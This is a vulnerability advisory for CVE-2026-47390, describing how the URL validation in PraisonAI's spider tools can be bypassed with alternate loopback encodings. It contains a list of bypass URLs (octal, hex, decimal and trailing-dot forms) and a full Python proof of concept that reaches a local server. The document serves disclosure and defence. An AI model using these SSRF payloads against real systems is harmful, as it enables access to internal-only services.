PT-2026-45049 · Pypi · Praisonai+1

Published

2026-05-29

·

Updated

2026-05-29

·

CVE-2026-47390

CVSS v3.1

5.5

Medium

VectorAV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Summary

PraisonAI's spider tools URL validation can be bypassed using alternate loopback host encodings.
The affected component is:
praisonaiagents/tools/spider tools.py
The tool contains a URL validation function intended to block local or unsafe targets before fetching attacker-controlled URLs. However, the validation only blocks a small set of exact host strings such as localhost and 127.0.0.1.
It does not normalize hostnames, resolve DNS, parse numeric IPv4 variants, or validate the final resolved IP address before making the request.
As a result, URLs such as the following bypass the protection and still reach loopback services:
http://localhost.:8765/
http://127.1:8765/
http://0177.0.0.1:8765/
http://0x7f000001:8765/
http://2130706433:8765/
After the weak validation passes, scrape page() calls requests.Session.get() on the attacker-controlled URL. This allows an attacker who can influence URLs passed to scrape page, crawl, or extract text to induce SSRF requests against loopback-only services.
This is a server-side request forgery protection bypass.

Details

The affected code is in:
praisonaiagents/tools/spider tools.py
The vulnerable flow is:
attacker-controlled URL
 -> spider tools. validate url(...)
 -> weak exact-host blocklist check
 -> validation passes for alternate loopback encodings
 -> scrape page(...)
 -> requests.Session.get(attacker url)
 -> loopback service is reached
The validation appears to block only exact local hostnames or exact IPv4 strings. For example, it blocks simple forms such as:
localhost
127.0.0.1
However, equivalent loopback forms are not rejected before the request is made.
Confirmed bypass examples:
http://localhost.:8765/
http://127.1:8765/
http://0177.0.0.1:8765/
http://0x7f000001:8765/
http://2130706433:8765/
These values can resolve or be interpreted as loopback addresses by the HTTP client / underlying networking stack, while bypassing the string-based validation.
The issue is not that spider tools can fetch arbitrary URLs. The issue is that it attempts to provide SSRF protection, but the protection can be bypassed with alternate representations of loopback addresses.

PoC

The following PoC is non-destructive. It starts a local HTTP server on 127.0.0.1:8765, then sends several alternate loopback URL forms through the real spider tools validation/fetch path.
The expected secure behavior is that all loopback variants should be rejected before any HTTP request is made.
The actual vulnerable behavior is that the alternate loopback forms pass validation and reach the local server.

Full PoC

#!/usr/bin/env python3
"""PoC for PraisonAI spider tools localhost-alias SSRF bypass."""

from  future  import annotations

import sys
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from pathlib import Path


REPO ROOT = Path( file ).resolve().parents[3] / "repos" / "praisonai"
AGENTS ROOT = REPO ROOT / "src" / "praisonai-agents"
SPIDER TOOLS = AGENTS ROOT / "praisonaiagents/tools/spider tools.py"


def verify source() -> None:
  expected = [
    "def validate url",
    "requests.Session",
    ".get(",
  ]

  text = SPIDER TOOLS.read text(encoding="utf-8")
  for needle in expected:
    if needle not in text:
      raise RuntimeError(f"source verification failed: {needle!r} not found in {SPIDER TOOLS}")


class LocalHandler(BaseHTTPRequestHandler):
  hits: list[tuple[str, str | None]] = []
  body = b"LOCAL-SPIDER-SSRF-SECRET"

  def do GET(self) -> None: # noqa: N802
    self. class .hits.append((self.path, self.headers.get("Host")))
    self.send response(200)
    self.send header("Content-Type", "text/plain")
    self.send header("Content-Length", str(len(self.body)))
    self.end headers()
    self.wfile.write(self.body)

  def log message(self, format: str, *args) -> None: # noqa: A003
    return


def main() -> int:
  if not SPIDER TOOLS.exists():
    raise SystemExit("missing local PraisonAI source tree")

  verify source()

  sys.path.insert(0, str(AGENTS ROOT))

  # Import the real shipped implementation.
  #
  # Depending on the exact public API exposed by spider tools.py,
  # use the exported scrape function available in the local version.
  # The important path is:
  #
  #  validate url(url)
  #   -> requests.Session.get(url)
  #
  import praisonaiagents.tools.spider tools as spider tools

  server = HTTPServer(("127.0.0.1", 8765), LocalHandler)
  thread = threading.Thread(target=server.serve forever, daemon=True)
  thread.start()

  candidates = [
    "http://localhost.:8765/",
    "http://127.1:8765/",
    "http://0177.0.0.1:8765/",
    "http://0x7f000001:8765/",
    "http://2130706433:8765/",
  ]

  try:
    for url in candidates:
      LocalHandler.hits.clear()

      try:
        # Prefer the real public scraping API when available.
        if hasattr(spider tools, "scrape page"):
          result = spider tools.scrape page(url)
        elif hasattr(spider tools, "extract text"):
          result = spider tools.extract text(url)
        elif hasattr(spider tools, "crawl"):
          result = spider tools.crawl(url)
        else:
          raise RuntimeError("No expected spider tools public fetch function found")

        reached = bool(LocalHandler.hits)
        contains secret = "LOCAL-SPIDER-SSRF-SECRET" in str(result)

        print(f"{url} passed=True reached loopback={reached} contains secret={contains secret}")

        if not reached:
          raise SystemExit(f"[poc] MISS: {url} did not reach loopback server")

      except Exception as exc:
        print(f"{url} blocked or failed={type(exc). name }: {exc}")
        raise

  finally:
    server.shutdown()
    server.server close()
    thread.join(timeout=1)

  print("[poc] HIT: alternate loopback URL forms bypassed spider tools SSRF protection")
  return 0


if  name  == " main ":
  raise SystemExit(main())

Confirmed local result

The following bypasses were confirmed locally:
localhost. True ok ok local hit
127.1 True ok ok local hit
0177.0.0.1 True ok ok local hit
0x7f000001 True ok ok local hit
2130706433 True ok ok local hit
This demonstrates that the validation allows alternate loopback representations and that the request reaches a local-only HTTP service.

Expected secure behavior

All loopback-equivalent addresses should be blocked before the HTTP request is made.
Examples that should be rejected:
http://localhost/
http://localhost./
http://127.0.0.1/
http://127.1/
http://0177.0.0.1/
http://0x7f000001/
http://2130706433/
http://[::1]/

Actual vulnerable behavior

Several alternate loopback representations pass validation and are fetched by the tool.

Impact

An attacker who can influence URLs passed to PraisonAI's spider tools can cause the process to send HTTP requests to loopback-only services.
Potential impact includes:
  • SSRF against localhost-only admin panels or development servers;
  • access to local HTTP services that are not intended to be reachable remotely;
  • retrieval of local service responses into the agent/tool output;
  • possible access to cloud metadata or private-network services if equivalent bypasses exist for those address ranges in a given deployment.
The most direct confirmed impact is loopback SSRF through alternate hostname/IP encodings.
This report does not claim arbitrary TCP access or remote code execution. The demonstrated behavior is HTTP(S) SSRF through the spider URL-fetching feature.

Fix

SSRF

Weakness Enumeration

Related Identifiers

CVE-2026-47390
GHSA-5C6W-WWFQ-7QQM

Affected Products

Praisonai
Praisonaiagents